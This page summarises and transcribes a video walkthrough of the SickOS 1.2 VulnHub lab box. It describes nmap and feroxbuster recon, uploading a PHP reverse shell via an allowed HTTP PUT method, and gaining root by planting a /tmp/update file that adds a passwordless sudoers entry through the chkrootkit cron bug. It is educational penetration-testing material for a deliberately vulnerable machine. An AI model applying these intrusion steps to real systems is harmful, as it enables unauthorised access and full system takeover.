SickOS 1.2: Vuln Hub OSCP like Box Complete Walkthrough
Summary
TLDRIn this tutorial video, HackRich demonstrates a walkthrough of the sickOS vulnhub box. Starting with identifying the IP address, the video progresses through nmap scanning, searching for vulnerabilities, and exploring the HTTP service. The host then leverages the PUT method to upload a reverse shell, gaining initial access as www-data. The video dives into privilege escalation, utilizing linpeas.sh to find vectors, and successfully exploits a chkrootkit vulnerability to escalate to root access, showcasing the importance of thorough investigation in the penetration testing process.
Takeaways
- 💻 The video is a walkthrough of hacking the sickOS vulnhub box.
- 🔍 The net discover tool is used to find the IP address of the sickOS box.
- 🛠️ Nmap is utilized to scan for open ports and service information on the sickOS box.
- 🚫 No exploitable vulnerabilities were found for light HTTP using searchsploit.
- 🌐 The HTTP service at the sickOS IP address reveals a webpage with a conspiracy theory about antivirus companies.
- 🔑 Feroxbuster is employed to brute force directories on the sickOS HTTP server.
- 📚 The PUT HTTP method is identified as allowed for a specific endpoint, which is unusual and significant.
- 💡 The presenter demonstrates how to use curl to check for allowed HTTP methods on an endpoint.
- 📎 A reverse shell is attempted to be uploaded to the server using the PUT method, but initially fails due to an error.
- 🔄 After resolving the error, the reverse shell is successfully uploaded and executed, providing initial access to the server.
- 🔄 The linpeas.sh script is used to search for privilege escalation vectors on the compromised machine.
- 🔍 The script reveals a potential exploit for the Linux version running on the server.
- 🛠️ An exploit is compiled and transferred to the sickOS machine, but execution initially fails.
- 🕵️♂️ Linpeas suggests several exploits and CVEs that could be tried for privilege escalation.
- 🔄 The presenter finds a vulnerability in the chk rootkit cron job and uses it to gain root access by creating an executable 'update' file.
- 🎉 The video concludes with the successful gain of root access, emphasizing the importance of digging deeper and learning from the process.
Q & A
What is the purpose of the video?
-The video is a walkthrough of the sickOS vulnhub box, demonstrating the process of hacking into the system and gaining root access.
What tool is used initially to find the IP address of the sickOS box?
-The 'net discover' tool is used to find the IP address of the sickOS box.
What command is used to run a vulnerability scan on the sickOS box?
-The command 'sudo nmap -sC -sV -o -p-' is used to run a vulnerability scan and gather information about the services and OS.
Which ports were found open during the nmap scan?
-Two ports were found open: port 22 for SSH server and port 80 for HTTP service.
What is the significance of checking for vulnerabilities in the light HTTP version?
-Checking for vulnerabilities in the light HTTP version is important to identify any potential security weaknesses that could be exploited during the penetration testing process.
What method is used to brute force directories on the sickOS box?
-Feroxbuster is used to brute force directories with the '-u' flag for URL, '-w' for wordlist, and '-x' to specify file extensions.
Why is the PUT HTTP method significant in this context?
-The PUT method is significant because it is used to create a new resource or update an existing one on the server, which can be exploited to upload a reverse shell.
What error occurred when attempting to upload the reverse shell and how was it resolved?
-An error 417 'Expectation Failed' occurred. It was resolved by adding a specific flag to the curl command to handle the expectation issue.
What is the role of linpeas.sh in the process?
-Linpeas.sh is a script that helps in looking for possible privilege escalation vectors by analyzing the system for known vulnerabilities and misconfigurations.
How is the final privilege escalation achieved?
-The final privilege escalation is achieved by exploiting a vulnerability in the chk rootkit's cron job, which allows executing an 'update' file as the root user, granting sudo access to the www-data user.
What is the significance of the final step where the user becomes root?
-The significance of becoming root is that it demonstrates successful privilege escalation, giving the attacker full control over the system, which is the ultimate goal in a penetration test.
Outlines
🔍 Initial Reconnaissance and Nmap Scan
The script begins with the host, HackRich, introducing a walkthrough of the sickOS vulnhub box. The first step is to discover the IP address of the sickOS box using the net discover tool. The IP address of the Kali Linux box is also revealed for reference. A subsequent nmap scan is performed to identify open ports and services, revealing port 22 for SSH and port 80 for HTTP service, both running light HTTP version 1.4.28. A searchsploit check finds no vulnerabilities for this version. The script then proceeds to visit the HTTP service and attempts to brute force directories using feroxbuster, but no significant findings are made.
📚 Exploring HTTP Methods and Uploading a Shell
In this section, the script delves into the HTTP methods allowed for a particular endpoint, discovering that the PUT method is enabled. The host explains the typical uses of GET, PUT, and DELETE methods. An attempt is made to upload a reverse shell using curl with the PUT method, but an error 417 expectation failed is encountered. After researching the error, a solution is applied, and the shell.php is successfully uploaded to the server. The script then sets up a listener and attempts to execute the shell, but initially fails, possibly due to a firewall. The host then decides to use port 443, the default for HTTPS, to bypass this issue and successfully gains a shell, establishing initial access to the server.
🚀 Privilege Escalation and Linpeas Analysis
After gaining initial access, the script focuses on escalating privileges. The host upgrades the shell using a Python one-liner and changes the command line color for clarity. The linpeas.sh script is transferred to the compromised machine to search for possible privilege escalation vectors. The script identifies the Linux version and suggests a high probability of a privilege escalation vector. An exploit search for the specific version is conducted, but the host finds that the server version is older than the vulnerable versions. The script is compiled and transferred to the sickOS machine, but execution fails due to missing headers. After resolving compilation issues, the binary is transferred again, but execution still fails, prompting further analysis using linpeas results.
🔧 Exploiting chkrootkit Vulnerability for Root Access
The script identifies a vulnerability in the chkrootkit cron job, which is a security tool that searches for rootkit signatures. The linpeas script suggests that a version of chkrootkit has a local privilege escalation vulnerability. The host searches for and finds an exploit for this vulnerability, compiles it, and transfers it to the sickOS machine. The exploit requires creating an executable file named 'update' in the temp directory, which, when executed by the root user via the cron job, grants sudo access to the www-data user without a password. The host creates the 'update' file, makes it executable, and waits for the cron job to execute it, successfully granting root access.
🎉 Gaining Root Access and Conclusion
The final part of the script describes the successful exploitation of the chkrootkit vulnerability, which grants the www-data user sudo access without a password. The host verifies this by running 'sudo -l' and then uses 'sudo su' to gain root access. The script concludes by reflecting on the privilege escalation process, emphasizing the importance of understanding tools like chkrootkit and the value of digging deeper when using tools like linpeas. The video ends with a prompt for viewers to like, subscribe, and stay tuned for more content.
Mindmap
Keywords
💡sickOS vulnhub box
💡net discover
💡nmap
💡SSH server
💡HTTP service
💡searchsploit
💡feroxbuster
💡reverse shell
💡linpeas.sh
💡privilege escalation
💡cron job
💡chk rootkit
Highlights
Introduction to the walkthrough of the sickOS vulnhub box.
Using net discover to find the IP address of the sickOS box.
Running nmap to scan open services and version information.
Identification of open ports 22 (SSH) and 80 (HTTP) on sickOS.
Checking for vulnerabilities in light HTTP using searchsploit.
Visiting the HTTP website to gather initial information.
Using feroxbuster for directory brute forcing.
Discovery of the PUT HTTP method allowed on a particular endpoint.
Attempting to upload a reverse shell using the PUT method.
Encountering and resolving a 417 Expectation Failed error.
Successfully uploading the shell.php to the server.
Setting up a listener and executing the PHP script for a shell.
Gaining initial access to the server as the www-data user.
Upgrading the shell with a Python script for better interaction.
Transferring linpeas.sh for privilege escalation analysis.
Analyzing the system with linpeas.sh for potential exploits.
Finding a potential privilege escalation vector in the Linux version.
Compiling and executing an exploit for privilege escalation.
Utilizing the chk rootkit vulnerability for privilege escalation.
Successfully gaining root access by exploiting chk rootkit.
Conclusion emphasizing the learning aspect of the process.
Transcripts
hi there this is HackRich welcome back to my channel so this video going to be a
walkthrough of sickOS vulnhub box and without wasting any time let's get started [Music]
so let's first find out the IP address of sickOS box using net discover tool so first let me
find out the IP address of this Kali box sorry it's a config so this is the IP address clear
sudo net discover IP addresses this hit enter
yeah this is the IP address of sickOS box you can cross verify it using this Mac address
so copy this IP address
so let's run the nmap scan to find out what are the services open on this box sudo nmap -sC to
run the vulnerability scanning script -sV to find out the version information of the service -o to
find out the OS information -p- to scan all the port and IP address of sickOS box 192.168.29.98
hit enter
so looking into nmap result there are two Port open one is port 22 which is
SSH server and another one is Port 80 which is HTTP service and we also have the version
information of light HTTP we can definitely look into searchsploit to check whether this
particular version has any vulnerability or not so let's check that right now searchsploit no result
okay denial of service, code execution but it is 1.4.15 ours is 1.4.28 okay nothing interesting and
this is Linux box let's visit this HTTP website copy this IP address paste it here hit enter
what if computer viruses are really made by the antivirus software companies to make money
so let's look into the page source okay nothing in here okay fine so let's brute force the directory
copy the URL so let's use feroxbuster
-u URL -w specify the word list
-x to specify the extension file extension txt and PHP,HTML hit enter
okay so this is index.php I think this is home page only copy this
yeah this is home page
and copy this
parent directory okay
nothing interesting
here there is a disclosure of version of light http
other than that nothing interesting
so let's use different word list let's use small.txt
no same thing let's use Big.txt
okay nothing interesting so after doing little bit research on this website for this particular
endpoint PUT HTTP method is allowed why is this important usually GET method is used to retrieve
the data from the server and PUT method is used to create a new resource or update the existing
resource in the server and DELETE method is used to delete the resource from the server
and you can use the OPTIONS method find out what are the HTTP methods are allowed for
particular endpoint I will show you how to find out that copy this URL so let's use Curl curl -X
to specify the HTTP method I will specify OPTIONS and the URL hit enter you have to specify verbose
and you can see here PUT method is allowed so let's PUT the reverse shell into this folder
so this is the reversal let me open this so here I have to change the IP address so ifconfig
so this is the ip address let's copy this
yeah this is the port number and Save
so clear
-X
upload file name is reverse shell
shell not reverse shell yeah hit enter
so we got some error 417 expectation failed so let's Google this error
so
so by adding this flag we can solve this error let's copy this
hit enter
I think we successfully uploaded this shell.php to the server so let's go to the server
let's refresh the page yes we have that shell.php here right let's set up the listener so
clear this and nc -lvp yes hit enter so now click on shell.php to execute this PHP script
so let's go back
I'm not sure why we didn't get a shell in my knowledge we should get a shell or there
might be a possibility that there is a firewall sitting up there and blocking a server to connect
to random Port because this 1337 is a random Port right so let's use a well-known port for
example let's use https default Port which is 443 that might fix this issue let's see so I have to
modify the script so here I have to use 443 and save it and let's rename this to something else
443 hit enter and exit
443 hit enter so let's check whether it uploaded this script or not
yes we have that script here so let's listen to 443
click on this to execute this PHP file script
yeah we got a shell so we successfully got an initial access to the server so if I say ID
so I am WWW data right so the next step is to root this box or get the root access
right so before that let's upgrade this shell using this python code hit enter
and clear you know let's set the term environment
export
term equal to xterm
clear yeah so let's change this command line color because this white is kind of confusing
so hit enter yeah so now clear this so now let's transfer the linpeas.sh to this machine
linpeas.sh is present in my Kali box I don't know you are aware of linpeas or not linpeas is a shell
script which will look for possible privilege escalation vector so let's go to Temp folder
and so let's go to desktop
yeah this is the file I want to transfer so I will set up simple python server so what was the IP
address of this kali box I forgot just ifconfig so this is the IP address right okay so wget
http IP address of Kali box
and 8000 linpeas.sh
why it is not working yeah I think same reason uh
firewall is blocking this machine to connect to random port so let's Ctrl C
so let's Host this simple python server with the port number 443
http IP address of Kali box 443 file name then linpeas.sh
yes that was the reason so if I say ls -al so we have linpeas.sh in this machine so let's
make it as executable chmod +x linpeas.sh so let's run the script clear linpeas.sh
so if you look at here this particular Linux version is marked in a yellow
color right so that means there is a 95% chance that there is a privilege
escalation Vector so let's search in the Google to check whether is there
any exploit exist for this particular Linux version so let's copy this version
privilege escalation
so let's go to this
so this is less than 3.13.2 [Music] server is 3.11 that's fine
so let's copy the exploit
so so let's save this file in the local machine exploit.c
paste the code Ctrl X
so let's set up the simple HTTP server using python
so let's download this file
yes so there is an instruction to compile this source code
yeah here GCC source code.c and yeah this is simple right so GCC exploit.c -o exploit
okay we are getting another so let's try this let's compile this binary in this local machine
only after compiling the binary let's transfer that binary file to sickOS machine Ctrl C so GCC
exploit.c -o exploit okay we are getting some error
time is defined in the header okay we need to include this header that's
okay and compile again we are getting some error let's copy this error let's search in the Google
by compiling this flag so let's copy this
yeah we successfully compiled the binary file so let's transfer this binary file to sickOS machine
so let's set up the simple HTTP server
so same thing wget so what is IP address this is right
so let's make it as executable
and let's run the binary file
okay still we got an error cannot execute the binary file okay that's fine let's
go through the result generated by this linpeas so let's go up
yeah so so if you look at here so these are the exploits suggested by the linpeas
you can try all of this I have tried this dirtycow but I got the same error as we get
for previous exploit we tried right so let's go down you can definitely try all of this exploit
so here also some of the CVE suggested by the linpeas you can try all of this
so here linpeas listed all the weird or unexpected process run by the root user
so here lipeas listed all the cron job present in this machine so if you don't know what is
cron job using cron job we can execute the script or job on a given schedule that means if I want to
run the particular script daily or weekly I can specify in the cronjob it will run automatically
if you look at here chk rootkit also present in this cron job so chk rootkit
is a security tool which search's for rootkit Signature in the system so if you also go up
so if you look at here linpeas also suggested chk rootkit vulnerability because the problem
is some of the chk rootkit version has some vulnerability so if I check in the searchsploit
so let's clear this out searchsploit so you can see here this version of the chk rootkit
has the vulnerability of local privilege escalation so let's copy this file
yeah let's view that text file
so you can read about this exploit so we just followed a serious vulnerability in the chkrootkit
okay
so here they specify how to reproduce this bug so we have to put an executable file named update
it's an non root owner in the temp folder then run the chk rootkit okay in our case
chk rootkit present in cronjob so it will be run by the root user right so if you look at here
so the owner of the chk rootkit script is root so that means most probably this script is run
by root user so let's reproduce this vulnerability so let's clear this out
so let's create a update file in the temp directory touch
update so if I say ls -al update so we have the update file in this temp directory
so because this update file is executed by the root user so I will put the command in this update
file which will give the sudo access to this www data user without using password so equal
www data
ALL
no password
/etc/sudoers
so this is the command is responsible for giving the sudo access to WWW data
so if I hit enter if I cat update file
okay we have the command in this update file so let's make this update file executable
if I say ls -l update yeah it is executable
okay let's wait for some time so now what happens is cronjob will run that vulnerable chk rootkit
when it is ran this update file will be executed by the root user so that means it will execute
this Command right so this will give the sudo access to www data user so let's wait for some time
sudo -l yeah you can see here this www-data has a sudo access so if I say ID
so I am www-data user so now I will say sudo su
so now I am root if I say id
I am root user so we successfully gain the root access I agree that this privilege escalation
process was not straightforward because if you don't know what is chk root then you will not be
be end up with root access right but it is not that if you run the linpeas script you will get
the privilege escalation Vector sometime you have to dig deeper that is fine it's all about learning
so that is all for this video Until then stay tuned like the video and subscribe the channel
thank you
Ver Más Videos Relacionados
Simple Penetration Testing Tutorial for Beginners!
All-In-One Open Source Security Scanner | Docker Image Analysis with Trivy
What Are The Types Of Penetration Testing? | PurpleSec
Metasploit For Beginners - How To Scan And Pwn A Computer | Learn From A Pro Hacker
How to install MongoDB 6 on Ubuntu 22.04 LTS Linux
Subnetting (Solved Problem 6)
5.0 / 5 (0 votes)